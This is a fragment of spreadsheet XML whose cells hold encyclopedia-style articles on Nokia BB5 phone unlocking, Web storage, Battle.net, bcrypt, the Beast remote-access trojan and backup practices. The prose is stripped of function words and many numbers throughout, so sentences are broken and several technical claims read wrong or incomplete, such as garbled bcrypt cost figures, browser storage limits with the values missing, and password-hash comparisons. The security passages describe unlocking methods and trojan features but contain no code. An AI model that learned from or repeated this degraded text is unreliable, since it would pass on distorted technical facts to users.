waterfox. references</t>
  </si>
  <si>
    <t>Base Band 5</t>
  </si>
  <si>
    <t>base band abbreviated bb5, current mobile baseband generation implemented nokia mobile phones replacement prior (digital core technology) generations. this generation nokia phone basebands uses range chipsets, systems components well enhanced security mechanisms preventing manipulations firmware system configurations. phones' system interface changed previous generations allow, instance, flashing device usb. unlocking system designed prevent unlocking certain capabilities handsets (such usable network installation unsigned operating system), approved nokia network. just like dct-4 (dct generation locking system, unlocking code unique handset stored inside handset, hash signature, calculated secret algorithm phone uses part verify code. however, unlike earlier dct-4 baseband, possible custom code, generations uses texas instrument processor trustzone, unlock code hash checking implemented special pa_xx applet, executed protected mode. idea behind approach possible patch simlock applet fooling phone accepting wrong code. 2007, engineer named dejan kaljevic serbia (who earned fame free dct-3 dct-4 unlocking solutions), released free program unlock many older nokia phones nokia 6630, nokia 6680, nokia 6681 nokia n70. there reports models include nokia e60, nokia e65, nokia e70, nokia n71, nokia n90, nokia n91, nokia n93, deemed fake, since unlocker supports older models. this easily done end-user phone's pop-port connecting legacy fbus compatible cable dku-5, computer running unlocking software package. since then, commercial unlocking solutions offered others along successful claims newer nokia phones well. july 2007, kaljevic released instructions schematics build hardware solution unlocking nokia n95. based cpld logic worked manipulating instructions on-the-fly, fooling phone wrong unlock code accepted like correct one. however, designed end-users, since requires advanced knowledge electronics soldering skills accomplish. august 2008, kaljevic released full unlock newer handsets require soldering. since release generation, although numerous hacks released allowed unlocking 2014 possible load modified firmware phone. security code 2009, nemesis service suite (nss) become popular software package order unlock extract information certain phones. with extra equipment, many phone could unlocked using nss. also popular generate master-code code bypassing nokia's unlock screen) phones. method finding master code done using connecting nokia phone windows device running nss. would mine phone information produce file, storing master-code plus phone related information within file. 2008, unlockitfree produced site steps process windows users. final step website upload data dumped unlockitfree. steps followed successfully, server would parse data dump file identify security code device. notes</t>
  </si>
  <si>
    <t>Batch cryptography</t>
  </si>
  <si>
    <t>batch cryptography area cryptology cryptographic protocols studied developed cryptographic processes like encryption/decryption, exchange, authentication, etc. batch instead one. concept batch cryptography introduced amos fiat 1989. references</t>
  </si>
  <si>
    <t>Web storage</t>
  </si>
  <si>
    <t>storage, sometimes known storage (document object model storage), provides apps methods protocols storing client-side data. storage supports persistent data storage, similar cookies greatly enhanced capacity information sent http request header. there main storage types: local storage session storage, behaving similarly persistent cookies session cookies respectively. storage standardized world wide consortium (w3c) whatwg, supported major browsers. features storage differs cookies ways. purpose cookies intended communication servers; automatically added requests accessed server client-side. storage falls exclusively purview client-side scripting. storage data automatically transmitted server every http request, server can't directly write storage. however, either effects achieved explicit client-side scripts, allowing fine-tuning server's desired interaction. storage size cookies restricted kilobytes. storage provides greater storage capacity: opera 10.50+ allows safari allows firefox allows (formerly origin 2007) google chrome allows origin internet explorer allows storage area local session storage storage offers different storage areas—local storage session storage—which differ scope lifetime. data placed local storage origin—the combination protocol, host name, port number defined same-origin policy. data available scripts loaded pages origin previously stored data persists browser closed. such, storage suffer cookie weak integrity weak confidentiality issues, described 6265 sections 8.6. session storage per-origin per-instance (per-window per-tab) limited lifetime instance. session storage intended allow separate instances different windows without interfering other, case that's well supported cookies. interface data model storage provides better programmatic interface cookies exposes associative array data model keys values strings. additional accessing structured data considered applications working group. usage browsers support storage global objects sessionstorage localstorage declared window level. following javascript code used browsers trigger storage behavior:only strings stored storage api. attempting store different data type result automatic conversion string browsers. conversion json, however, allows effective storage javascript objects. nomenclature draft titled "web storage". "dom storage" also commonly used name, though becoming less example "dom storage" articles mozilla microsoft developer sites replaced "web storage" articles.the "dom" storage literally refer document object model. according w3c, "the term used refer made available scripts applications, necessarily imply existence actual document object..." storage management storage storage objects enabled default current versions supporting browsers, browser vendors providing ways users natively enable disable storage, clear storage "cache". similar controls storage also available party browser extensions. each browser stores storage objects differently: firefox saves storage objects sqlite file called webappsstore.sqlite user's profile folder. google chrome records storage data sqlite file user's profile. subfolder containing file "\appdata\local\google\chrome\user data\default\local storage" windows, "~/library/application support/google/chrome/default/local storage" macos. opera's storage located either "\appdata\roaming\opera\opera\sessions\autosave.win" "\appdata\local\opera\opera\pstorage\" depending upon opera's version. internet explorer's storage "\appdata\locallow\microsoft\internet explorer\domstorage". safari's storage located folder labeled "localstorage" within hidden "safari" folder. also indexed database references external links html living standard storage w3c: storage storage mozilla developer network opera: storage: easier, powerful client-side data storage local storage blackberry devzone</t>
  </si>
  <si>
    <t>Battle.net</t>
  </si>
  <si>
    <t>battle.net internet-based online game, social networking service, digital distribution, digital rights management platform developed blizzard entertainment. service launched december 1996, followed days later release blizzard's action-role-playing video game diablo january 1997. battle.net officially renamed "blizzard battle.net" august 2017, change reverted january 2021.battle.net first online gaming service incorporated directly games make contrast external interfaces used online services time. this feature, along ease account creations absence member fees, caused battle.net become popular among gamers became major selling point diablo subsequent blizzard games. since successful launch battle.net, many companies created online game services mimicking blizzard's service package user interface. blizzard entertainment officially unveiled revamped battle.net march 2009. later revealed details battle.net revamped features blizzcon 2009 supported world warcraft, starcraft diablo iii. original battle.net renamed battle.net classic. battle.net classic games different account system games battle.net 2.0. platform currently supports storefront actions, social interactions, matchmaking blizzard's modern games including hearthstone, heroes storm, overwatch, starcraft: remastered, well various call duty games, crash bandicoot it's about time corporate sibling blizzard entertainment, activision. platform provides cross-game instant messaging voice chat service. september 2017, blizzard entertainment released battle.net application android ios. includes ability chat friends addition seeing games currently playing. history battle.net classic when service initially launched december 1996 (the first game using service diablo releasing days later january 1997), battle.net offered basic services like chatting game listings. players could connect service, talk gamers join multiplayer games diablo. besides user account data, game data stored battle.net servers. when player connected game, would connecting directly players game. data sent battle.net servers. while made service quick easy use, quickly widespread cheating since players using cheats could modify game data locally. however, since option create private games, many players ended playing people knew. release starcraft 1998 increased usage battle.net service significantly. features ladder ranking game filters added service. battle.net grew even larger release expansion pack starcraft: brood war, tens thousands players logged given time (even present day). starcraft battle.net especially successful south korea, number players logged often many times united states. starcraft also brought copy protection scheme using keys. under diablo, battle.net would allow client connect service. with starcraft, players valid unique generated 13-digit number distributed boxed game allowed onto service. only person could connect battle.net using specific time. cd-keys could also muted (unable chat channels whisper), voided (restricted void channel), jailed (both muted voided) banned battle.net entirely. every blizzard game since starcraft used system connect battle.net. starcraft: brood used cd-key whatever cd-key found original starcraft computer, thus installable original already installed. with release gateway system brood (selectable regional server clusters), players play time, long different gateways. given gateways expectedly separate other, games list user accounts shared across gateways, still maintained cannot play game chat other, etc. diablo released 2000 much fanfare. main highlight diablo relates battle.net game used client–server model. game longer simulated player's computer, instead blizzard's server. this also meant character data game stored battle.net servers. game also open character feature battle.net stored player's character client. this allowed players play characters locally lan, characters battle.net. however, open games played battle.net protected cheating players since could modified characters locally. diablo also unique feature would show players battle.net chat room avatars looked like characters game. also used different battle.net interface previous games, previously mainly color differences. there also expanded ladder support including "hardcore" ladder listed players whose characters would removed permanently died in-game. again, diablo usage battle.net increased steadily, climbing even higher release expansion pack diablo lord destruction 2001. warcraft iii: reign chaos released 2002 expansion pack, warcraft iii: frozen throne, released 2003. release games brought number features online service. significant feature added probably concept anonymous matchmaking. this feature allowed user wanted play game simply press button automatically matched players similar skill (based ranking) also wanted play game. this allowed people games quickly easily. also reduced win-trading, people would purposely lose games artificially raise rank ladder. matchmaking concept also expanded team games feature called "arranged teams". arranged team game, could make team friends, anonymously matched another team size rank. however, strategy introduced cheat automated 'fair' matchups, called 'abusing', simply someone losing arranged team games intentionally ally another ally (who wants gain wins easily) find difficult automatic matchups would players relatively unskilled players. automated tournaments added expansion, players would compete crowned tournament champion series games played throughout day. addition game styles, slew features added including selectable chatroom icons unlocked based player's number wins, friends list, clan support. battle.net battle.net revamped blizzard entertainment 2009 officially unveiled march 2009, elaborated blizzcon 2009. battle.net contains three unique sections. first allows players connect battle.net accounts, world warcraft characters friends list together integrate unified single battle.net account. players also unlock achievements in-game would turn unlock avatars decals would shown player's profile, decals also seen in-game player's units. second section consists making battle.net competitive platform players involves improved matchmaking system, simplifying process players organizing games. ladder system also revamped; system classifies players certain leagues according level competitiveness. players would compete others similar skill level own, albeit across leagues. there also special practice league practice hone skills, game speed reduced maps designed create slower pace game. party system works similar world warcraft players friends would join together enter games party.the final section involves chat system involves system similar instant messaging across games. players communicate friends across games, servers, characters.world warcraft initially support battle.net, separate accounts battle.net revamp battle.net march 2009 forced players merge world warcraft accounts battle.net accounts. features battle.net utilized world warcraft include allowing players engage cross-realm, cross-faction cross-game chat, allows players talk friends real friends list, factions, servers well games starcraft diablo iii. november 2009 blizzard entertainment made battle.net mandatory feature world warcraft players. starcraft first game natively support revamped battle.net online interface. split three installments: base game subtitle wings liberty, expansion pack heart swarm, stand-alone expansion pack legacy void downloadable content mission packs nova covert ops.the interface includes chat service similar instant messengers allows players interact across different games. platform also supports voip players.on 2010, blizzard revealed battle.net would integrated social networking site facebook, "linking world's premier online gaming platform world's popular social platform". blizzard battle.net desktop august 2013, blizzard entertainment released open beta battle.net launcher. launcher desktop application allows players purchase, install patch games, provides access friends list messaging. also provides access account management game services. blizzard launches cross-game voice chat service october 2016. blizzard voice integrated battle.net application.in february 2017, blizzard introduced ability obtain blizzard storefront credit trading "wow tokens" world warcraft, bought in-game gold initially used means trading credits players world warcraft. these credits could used purchase blizzard games content, card packs hearthstone loot boxes overwatch.the windows version destiny developed bungie published corporate sibling blizzard entertainment, activision, exclusively sold launched battle.net windows release october 2017 well used support game's matchmaking capabilities, making first non-blizzard game supported launcher. blizzard affirmed players gold farming world warcraft generate credit towards blizzard account towards purchase destiny blizzard said also "potentially evaluating needs opportunities future activision games" supported battle.net; call duty: black scheduled release late 2018, second title service. blizzard said plan extend similar support third-parties, fearing would weaken quality control product.destiny removed battle.net october 2019, bungie activision amicably terminated publishing deal, bungie transitioning players steam instead date.a major user interface update battle.net issued january 2021, aimed provide better visibility news user's friends list, accessibility features, navigation features. blizzard battle.net mobile september 2017, blizzard entertainment released battle.net application android ios. provides simple social networking features user's friends battle.net, including accepting sending friend invitations chatting friends. rebranding late 2016, blizzard entertainment announced plans rebrand battle.net. according mike morhaime, company found position competing brands blizzard battle.net creating confusion players find information games, wanted consolidate branding. their first step plan retire "battle.net" name favor calling service "blizzard tech", announced september 2016, renaming client "blizzard app" march 2017. however, following change, blizzard realized "battle.net" brand much legacy behind since dropping brand created additional confusion users. this became issue blizzard sought destiny service, wanted clear game developed blizzard used battle.net framework, "blizzard app" branding would provide clarity. august 2017, blizzard entertainment stepped back full rebranding, announced going forward, would call service application "blizzard battle.net", morhaime said best found combine brands minimize consumer confusion. february 2021, blizzard entertainment released interface rebranded application "battle.net" original name. development security help users protect battle.net accounts, blizzard entertainment implemented two-factor authentication option service. launched 2008, initially separate device could purchased blizzard, encoded user's credentials. device keychain would generate pseudorandom numbers linked player's account, would enter logging battle.net affirm identity. later, blizzard introduced battle.net mobile application android platforms 2009, replicating functionality. update june 2016 simplified process, allowing user, logging battle.net account computer, simply press single button connected mobile device affirm authenticity. though required battle.net, game aspects require user enable two-factor authentication either device mobile app. growth history november 1997, blizzard entertainment claimed battle.net million games played, 1.25 million different users, averaged 3,500 users day. april 1999, reported battle.net million active users, 50,000 concurrent users. september 2002, active user count jumped million. september 2004, active user count nearly million, spending million hours online day, average 200,000 concurrent users, peak concurrent user count 400,000. 2006, blizzard claimed battle.net, combined world warcraft subscriber base, leader online gaming, noting "even xbox live even close us". community content community developers arisen around battle.net. many unofficial clients available battle.net, protocol used battle.net-enabled games reverse-engineered published volunteers. also, several communication tools made, like "whisper" tool, player could talk friends even game. custom games (using maps made blizzard entertainment) helped build community, substantial portion games played. among popular games warcraft tower defense maps "hero solo" maps (such defense ancients, arena maps) pure games like "civilization wars", player develops economy, tech, unit diversity player control units. controversy bnetd group gamers reverse engineered network protocol used battle.net blizzard games, released free (under gpl) battle.net emulation package called bnetd. with bnetd, gamer required official battle.net servers play blizzard games. february 2002, lawyers retained blizzard entertainment threatened legal action digital millennium copyright (dmca) developers bnetd. blizzard games designed operate online exclusively blizzard-controlled servers collectively known "battle.net". battle.net servers include check means preventing software piracy. despite offers bnetd developers integrate blizzard's checking system bnetd, blizzard claims public availability software package facilitates piracy, moved bnetd project shut provisions dmca. case first major test cases dmca, electronic frontier foundation became involved. negotiations ongoing resolve case without trial. however, negotiations failed blizzard case counts: defendants ruled breached starcraft's user license agreement (eula) terms battle.net. this decision appealed eighth circuit court appeals, also ruled favor blizzard entertainment/vivendi september 2005. privacy real july 2010, blizzard entertainment announced planned change forums worked require users identify real name. reaction community overwhelmingly negative multiple game magazines calling change "foolhardy" "epic fail". also resulted largest user response ever blizzard forums. this included personal details blizzard employee gave real name show deal". shortly revealing real name, personal information posted included phone number, picture, age, home address, details.some technology media outlets suggested change good idea would benefit battle.net blizzard community. others worried blizzard would open fans real-life dangers stalking, sexual predators, employment issues, since simple google search user's employer would reveal online activities. there also concern would lead real-life harassment safety concerns, especially women transgender gamers already harassed quite often in-game.blizzard entertainment initially responded concerns saying changes would retroactive previous posts, parents could system minors cannot post, posting forums optional. however, huge negative response, blizzard president michael morhaime issued statement rescinding plan real names blizzard's forums time being. 2012 hacking during 2012, blizzard entertainment suffered number incidents related security. 2012, shortly diablo iii's launch, discovered number accounts hacked using traditional means password knowledge, affected game characters stripped in-game possessions could sold money. blizzard noted time accounts affected authentication option, made changes improve security, authentication requirement game's auction house. months later august 2012, blizzard reported battle.net servers hacked into, perpetrators gaining access personal information, including user e-mail addresses, answers security questions, scrambled passwords, enough user accounts compromised, according blizzard. blizzard entertainment required players battle.net north america change password suggested users change security questions.these security breaches class-action lawsuit blizzard entertainment november 2012, claiming company making profit sale authenticator devices rather using money enhance security servers, failed notify affected users august data breach timely manner. most claims suit summarily dismissed favor blizzard entertainment july 2013, primarily plaintiffs could show harm suffered breaches, remaining claims related battle.net authenticator promotional claims resolved mediation. case ultimately closed february 2014. games battle.net version battle.net classic diablo diablo (lord destruction) starcraft (brood war) warcraft battle.net edition warcraft iii: reign chaos (the frozen throne) restricted chat functionality diablo shareware diablo spawn diablo starcraft shareware starcraft spawn japanese starcraft (public beta japanese version starcraft) japanese starcraft spawn battle.net world warcraft (the burning crusade, wrath lich king, cataclysm, mists pandaria, warlords draenor, legion, battle azeroth, shadowlands) warcraft iii: reforged starcraft wings liberty (heart swarm, legacy void) starcraft: remastered diablo diablo immortal diablo (reaper souls) diablo resurrected hearthstone heroes storm overwatch blizzard arcade collection (the lost vikings, rock roll racing, blackthorne) call duty: black call duty: modern warfare (warzone) call duty: modern warfare campaign remastered call duty: black cold call duty: vanguard crash bandicoot it's about time longer available destiny also pvpgn references external links official website</t>
  </si>
  <si>
    <t>Web shell</t>
  </si>
  <si>
    <t>Bcrypt</t>
  </si>
  <si>
    <t>bcrypt password-hashing function designed niels provos david mazières, based blowfish cipher presented usenix 1999. besides incorporating salt protect rainbow table attacks, bcrypt adaptive function: time, iteration count increased make slower, remains resistant brute-force search attacks even increasing computation power. bcrypt function default password hash algorithm openbsd default linux distributions suse linux.there implementations bcrypt c++, embarcadero delphi, elixir, java, javascript, perl, php, python, ruby, languages. background blowfish notable among block ciphers expensive setup phase. starts subkeys standard state, uses state perform block encryption using part key, uses result encryption (which accurate hashing) replace subkeys. then uses modified state encrypt another part key, uses result replace subkeys. proceeds fashion, using progressively modified state hash replace bits state, subkeys set. provos mazières took advantage this, took further. they developed setup algorithm blowfish, dubbing resulting cipher "eksblowfish" ("expensive schedule blowfish"). setup begins modified form standard blowfish setup, salt password used subkeys. there number rounds standard blowfish keying algorithm applied, using alternatively salt password key, round starting subkey state previous round. theory, stronger standard blowfish schedule, number rekeying rounds configurable; process therefore made arbitrarily slow, helps deter brute-force attacks upon hash salt. description input bcrypt function password string bytes), numeric cost, 16-byte (128-bit) salt value. salt typically random value. bcrypt function uses inputs compute 24-byte (192-bit) hash. final output bcrypt function string form: $2&lt;a/b/x/y&gt;$[cost]$[22 character salt][31 character hash] example, input password abc123xyz, cost random salt, output bcrypt string $2a$12$r9h/cipz0gi.urnnx3kh2opst9/pgbkqquzi.ss7kiugo2t0jwmuw \__/\/ \____________________/\_____________________________/ cost salt hash where: $2a$: hash algorithm identifier (bcrypt) input cost (212 i.e. 4096 rounds) r9h/cipz0gi.urnnx3kh2o: radix-64 encoding input salt pst9/pgbkqquzi.ss7kiugo2t0jwmuw: radix-64 encoding first bytes computed byte hashthe radix-64 encoding bcrypt uses table ./abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789, different 4648 base64 encoding. versioning history (1999) original bcrypt specification defined prefix $2$. this follows modular crypt format format used storing passwords openbsd password file: $1$: md5-based crypt ('md5crypt') $2$: blowfish-based crypt ('bcrypt') $sha1$: sha-1-based crypt ('sha1crypt') $5$: sha-256-based crypt ('sha256crypt') $6$: sha-512-based crypt ('sha512crypt') $2a$ original specification define handle non-ascii character, handle null terminator. specification revised specify hashing strings: string must utf-8 encoded null terminator must includedwith change, version changed $2a$ $2x$, $2y$ (june 2011) june 2011, discovered crypt_blowfish, implementation bcrypt. mis-handling characters set. they suggested system administrators update existing password database, replacing $2a$ $2x$, indicate hashes (and need broken algorithm). they also suggested idea crypt_blowfish emit $2y$ hashes generated fixed algorithm. nobody else, including canonical openbsd, adopted idea 2x/2y. this version marker change limited crypt_blowfish. $2b$ (february 2014) discovered openbsd implementation bcrypt. using unsigned 8-bit value hold length password. passwords longer bytes, instead truncated bytes password would truncated lesser length modulo 256. example, byte password would truncated bytes rather truncated bytes. bcrypt created openbsd. when library, decided bump version number. algorithm bcrypt algorithm result encrypting text "orpheanbeholderscrydoubt" times using blowfish. bcrypt usual blowfish setup function replaced expensive setup (eksblowfishsetup) function: function bcrypt input: cost: number (4..31) log2(iterations). e.g. 4,096 iterations salt: array bytes bytes) random salt password: array bytes (1..72 bytes) utf-8 encoded password output: hash: array bytes bytes) //initialize blowfish state expensive setup algorithm //p: array subkeys (uint32[18]) //s: four substitution boxes (s-boxes), s0...s3. each s-box 1,024 bytes (uint32[256]) eksblowfishsetup(cost, salt, password) //repeatedly encrypt text "orpheanbeholderscrydoubt" times ctext "orpheanbeholderscrydoubt" //24 bytes three 64-bit blocks repeat (64) ctext encryptecb(p, ctext) //encrypt using standard blowfish mode //24-byte ctext resulting password hash return concatenate(cost, salt, ctext) expensive setup bcrypt algorithm depends heavily "eksblowfish" setup algorithm, runs follows: function eksblowfishsetup input: password: array bytes (1..72 bytes) utf-8 encoded password salt: array bytes bytes) random salt cost: number (4..31) log2(iterations). e.g. 4,096 iterations output: array uint32 array per-round subkeys s1..s4: array uint32 array four sboxes; sbox uint32 (i.e. sbox kib) //initialize (subkeys), (substitution boxes) digits initialstate() //permute based password salt expandkey(p, salt, password) //this "expensive" part "expensive setup". //otherwise setup identical blowfish. repeat (2cost) expandkey(p, password) expandkey(p, salt) return initialstate works original blowfish algorithm, populating p-array s-box entries fractional part {\displaystyle hexadecimal. expand expandkey function following: function expandkey input: password: array bytes (1..72 bytes) utf-8 encoded password salt: byte[16] random salt array uint32 array subkeys s1..s4: uint32[1024] four sboxes output: array uint32 array per-round subkeys s1..s4: uint32[1024] four sboxes //mix password subkeys array password[32(n-1)..32n-1] //treat password cyclic //treat 128-bit salt 64-bit halves (the blowfish block size). salthalf[0] salt[0..63] //lower 64-bits salt salthalf[1] salt[64..127] //upper 64-bits salt //initialize 8-byte (64-bit) buffer zeros. block //mix internal state p-boxes //xor 64-bit block 64-bit salt half block block salthalf[(n-1) //each iteration alternating salthalf[0], salthalf[1] //encrypt block using current schedule block encrypt(p, block) block[0..31] //lower 32-bits block p2n+1 block[32..63] //upper 32-bits block //mix encrypted state internal s-boxes state block encrypt(state, block salt[64(n-1)..64n-1]) //as si[2n] block[0..31] //lower 32-bits si[2n+1] block[32..63] //upper 32-bits return state hence, expandkey(state, key) regular blowfish schedule since xors all-zero salt value ineffectual. expandkey(state, salt) similar, uses salt 128-bit key. user input many implementations bcrypt truncate password first bytes, following openbsd implementation. mathematical algorithm requires initialization 32-bit subkeys (equivalent octets/bytes). original specification bcrypt mandate particular method mapping text-based passwords userland numeric values algorithm. brief comment text mentions, mandate, possibility simply using ascii encoded value character string: "finally, argument secret encryption key, user-chosen password bytes (including terminating zero byte ascii string)."note quote mentions passwords bytes" even though algorithm makes byte initial value. although provos mazières state reason shorter restriction, motivated following statement bruce schneier's original specification blowfish, "the [bit] limit size ensures [sic] every every subkey depends every key."implementations varied approach converting passwords initial numeric values, including sometimes reducing strength passwords containing non-ascii characters. comparison password hashing algorithms important note bcrypt derivation function (kdf). example cannot bcrypt derive 512-bit password. time, algorithms like pbkdf2, scrypt, argon2 password-based derivation functions output used purpose password hashing rather derivation. password hashing generally needs complete 1000 scenario, bcrypt stronger pbkdf2, scrypt, argon2. pbkdf2: pbkdf2 weaker bcrypt. commonly used sha2 hashing algorithm memory-hard. sha2 designed extremely lightweight lightweight devices (e.g. smart cards). this means pbkdf2 weak password storage, purchase commodity sha-2 hashing hardware perform trillions hashes second scrypt: scrypt weaker bcrypt memory requirements less scrypt requires approximately 1000 times memory bcrypt achieve comparable level defense based attacks (for password storage). argon2: argon2 weaker bcrypt times less second (i.e. password authentication). argon2 match surpass bcrypt's strength ~1000ms runtimes (which unsuitable password hashing, perfectly acceptable key-derivation). pufferfish2 evolution bcrypt uses tunable memory footprint (like scrypt argon2), rather fixed memory footprint bcrypt. similar scrypt argon2, pufferfish2 gains difficulty using memory. unlike scrypt argon2, pufferfish2 operates core's cache. while scrypt argon2 gain memory hardness randomly accessing lots ram, pufferfish2 limits dedicated cache available core. this makes even harder implement custom hardware scrypt argon2. ideal memory footprint pufferfish2 size cache available core (e.g. 1.25 intel alder lake) this makes pufferfish2 much resistant asic. criticisms maximum password length bcrypt maximum password length bytes. this maximum comes first operation expandkey function xor's 4-byte subkeys password: p1..p18 p1..p18 passwordbytes password (which utf-8 encoded), repeated 72-bytes long. example, password correct horse battery staple␀ bytes)is repeated matches 72-bytes per-round subkeys: correct horse battery staple␀correct horse battery staple␀correct horse bytes)in worst case password limited characters, every character requires bytes utf-8 encoding. example: 𐑜𐑝𐑟𐑥𐑷𐑻𐑽𐑾𐑿𐑿𐑰𐑩𐑛𐑙𐑘𐑙𐑒𐑔 characters, bytes)this limit 72-byte passwords subkeys 4-bytes each) could addressed number ways: solution increase number subkeys increase number subkeys used, therefore increase maximum password length available. bruce schneier, original author blowfish, noted people could play adding rounds, requires subkeys, bcrypt would increase maximum password length. downside still maximum password length rather maximum length. solution continue bytes subkeys array password mixing continues long p1...p18. once reached still password bytes unprocessed, continue process downside approach computation time leaks password length (side-channel information leak). solution pre-hash password long password pre-hashed another cryptographic hashing function. this function always outputs digest fixed size. long resulting digest less bytes: bcrypt without off. this approach taken dropbox others. example, consider password: ਤੇਜ਼ ਭੂਰੇ ਲੂੰਬੜ ਆਲਸੀ ਕੁੱਤੇ ਉੱਤੇ ਦਿੱਤੀ characters, bytes)hashing password using hmacsha-256 would yield 256-bit (32-byte) digest: base64 encoding digest gives string consistently characters: p7kqhstx0wjqvj805zf+jaab0a00klhkjxgylotawpg= characters, bytes)and always 72-byte bcrypt limit. this similar approach used pufferfish2, cache-hard evolution bcrypt, uses hmacsha-512 convert password fixed length 64-byte (512-bit) key. password hash truncation bcrypt algorithm involves repeatedly encrypting 24-byte text: orpheanbeholderscrydoubt (24-bytes)this generates bytes ciphertext, e.g.: (24-bytes)the canonical openbsd implementation truncates bytes: (23-bytes)it unclear canonical implementation deletes 8-bits resulting password hash. these bytes become characters radix-64 encoded: fqatluk7q2ugv7hcjyncfii3wbjviai (31-characters) usage non-standard base64 encoding base64 encoding used canonical openbsd implementation uses encoding dictionary different available nearly every language platform. encoding compatible crypt. this means encoding compatible 4648. also argon2 winner password hashing competition 2015 bcrypt blowfish-based cross-platform file encryption utility developed 2002 crypt unix library function crypt unix utility ccrypt utility stretching mcrypt utility pbkdf2 widely used standard password-based derivation function pufferfish cache-hard password hashing function based improved bcrypt design scrypt password-based derivation function (and also utility) references external links crypt_blowfish, implementation maintained openwall</t>
  </si>
  <si>
    <t>Beast (Trojan horse)</t>
  </si>
  <si>
    <t>beast windows-based backdoor trojan horse, commonly known hacking community remote administration tool "rat". capable infecting versions windows written delphi released first author tataye 2002, became quite popular unique features. used typical client–server model client would operation attacker server would infect victim. beast first trojans feature reverse connection victims, established gave attacker complete control infected computer. virus would harmless opened. when opened, virus would code injection method inject applications.on machine running windows removal three files safe mode system restore turned would disinfect system. usage default ports used direct reverse connections 6666 9999 respectively, though attacker option changing these. beast came built-in firewall bypasser ability terminating anti-virus firewall processes. also came file binder could used join files together executable. also iloveyou list computer viruses references</t>
  </si>
  <si>
    <t>Backup validation</t>
  </si>
  <si>
    <t>backup validation process whereby owners computer data examine data backed order understand risk data loss might also speaks optimization processes, charging well estimating future requirements, sometimes called capacity planning. history over past several decades (leading 2005), organizations (banks, governments, schools, manufacturers others) increased reliance "open systems" less "closed systems". example, years ago, large bank might critical data housed mainframe computer "closed system"), today, bank might store substantially greater portion critical data spreadsheets, databases, even word processing documents (i.e., "open systems"). problem open systems primarily, unpredictable nature. nature open system exposed potentially thousands millions variables ranging network overloads computer virus attacks simple software incompatibility. one, indeed several combination, factors result either lost data and/or compromised data backup attempts. these types problems generally occur closed systems, least, unpredictable ways. "old days", backups nicely contained affair. today, ubiquity dependence upon, open systems, entire industry developed around data protection. three elements data protection validation, optimization chargeback. validation validation process finding whether backup attempt succeeded not, whether data backed enough consider "protected". this process usually involves examination files, "smoking gun" often left behind backup attempts takes place, well media databases, data traffic even magnetic tapes. patterns detected, error messages identified statistics extracted order determine backups worked not. according veeam availability report 2014 organizations test backups recoverability average every eight days. however, quarter, organizations test average 5.26 percent backups, meaning vast majority backups verified, could fail cause downtime. some backup software's validation consists solely examining backup file read backup program. that useful part validation, entire validation process, useless. proper validation process consists least processes. validation backup file little unless compares backup file's data data source. additionally, "validation" unknown unless known certainty backup file actually restore source's data. optimization optimization process examining productivity patterns process backup determine improvements made often, certain (less important) backup jobs eliminated entirely. chargeback very often, service backing data done person persons) service others, owners data. becoming prevalent today also charging services back data owners. simple backup might agreed upon, often case, complex charge based success rates, speed, size, frequency retention (how long copy kept) place. usually form service level agreement (sla) place backup service provider data owner agreed done service charged for. also backup backup software</t>
  </si>
  <si>
    <t>Backup software</t>
  </si>
  <si>
    <t>backup software computer programs used perform backup; create supplementary exact copies files, databases entire computers. these programs later supplementary copies restore original contents event data loss; hence, useful users. features there several features backup software make effective backing data. volumes voluming allows ability compress split backup data separate parts storage smaller, removable media cds. often used easy transport off-site inexpensive compared hard drives servers. however, recent increase hard drive capacity decrease drive cost made voluming less popular solution. introduction small, portable, durable drives, increase broadband capacity provided easier secure methods transporting backup data off-site. data compression since hard drive space cost, compressing data reduce size allowing less drive space used save money. access open files many backup solutions offer plug-in access exclusive, use, locked files. differential incremental backups backup solutions generally support differential backups incremental backups addition full backups, material newer changed compared backed data actually backed effect increase significantly speed backup process slow networks decreasing space requirements. schedules backup schedules usually supported reduce maintenance backup tool increase reliability backups. encryption prevent data theft, backup software offers cryptography features protect backup. transaction mechanism prevent loss previously backed data backup, backup software (e.g., areca backup, argentum backup) offer transaction mechanism (with commit/rollback management) critical processes (such backups merges) guarantee backups' integrity. also backup cloud storage list backup software references learning materials related backup software wikiversity</t>
  </si>
  <si>
    <t>Backup rotation scheme</t>
  </si>
  <si>
    <t>backup rotation scheme system backing data computer media (such tapes) minimizes, re-use, number media used. scheme determines piece removable storage used backup long retained backup data stored different techniques evolved time balance data retention restoration needs cost extra data storage media. such scheme quite complicated takes incremental backups, multiple retention periods, off-site storage consideration. schemes first first first first (fifo) backup scheme saves modified files onto "oldest" media set, i.e. media contain oldest thus least useful previously backed data. performing daily backup onto media, backup depth would days. each day, oldest media would inserted performing backup. this simplest rotation scheme usually first come mind. this scheme advantage retains longest possible tail daily backups. used archived data unimportant retained separately short-term backup data) data rotation period irrelevant. however, scheme suffers possibility data loss: suppose, error introduced data, problem identified several generations backups revisions taken place. thus error detected, backup files contain error. would useful least older version data, would error. grandfather-father-son grandfather-father-son backup (gfs) common rotation scheme backup media, three backup cycles, daily, weekly monthly. daily backups rotated daily basis using fifo system above. weekly backups similarly rotated weekly basis, monthly backup monthly basis. addition, quarterly, half-yearly, and/or annual backups could also separately retained. often backups removed site safekeeping disaster recovery purposes. tower hanoi tower hanoi rotation method complex. based mathematics tower hanoi puzzle, using recursive method optimize back-up cycle. every tape corresponds disk puzzle, every disk movement different corresponds backup tape. first tape used every ...), second tape used every fourth ...), third tape used every eighth ...).a tapes media) allow backups 2n−1 days last recycled. tapes give days' worth backups, overwritten; tapes give days, overwritten day; tapes give days, etc. files restored ..., 2n−1 days ago.the following tables show tapes used days various cycles. disadvantage method half backups overwritten days. three-tape hanoi schedule four-tape hanoi schedule five-tape hanoi schedule extensions example many variations possible, concepts readily extended disc-based directories containing backups. here options: save base backup zero. save many recent backups desired. save number, greater coverage.coverage automatically gets sparser back time goes, approximates likelihood needing restores past backups. tower hanoi huge advantage freeing implementers deal managing hourly, daily, weekly, monthly, quarterly annual management strategies. general, backup number used 2set−1 2set, ..., sequence serial number backup (also tower hanoi move number). here example showing coverage, including keeping least last days, recycling: precious.20140515.seq.0 precious.20150205.seq.256 precious.20151026.seq.512 precious.20160311.seq.640 precious.20160516.seq.704 precious.20160601.seq.720 precious.20160609.seq.728 precious.20160617.seq.736 precious.20160618.seq.737.recycle precious.20160619.seq.738 precious.20160620.seq.739 precious.20160621.seq.740 precious.20160622.seq.741 weighted random distribution alternative arrangement keep generations distributed across points time deleting overwriting) past generations (except oldest most-recent-n generations) necessary weighted-random fashion. deletion, weight assigned deletable generation corresponds probability deleted. acceptable weight constant exponent (possibly square) multiplicative inverse duration (possibly expressed 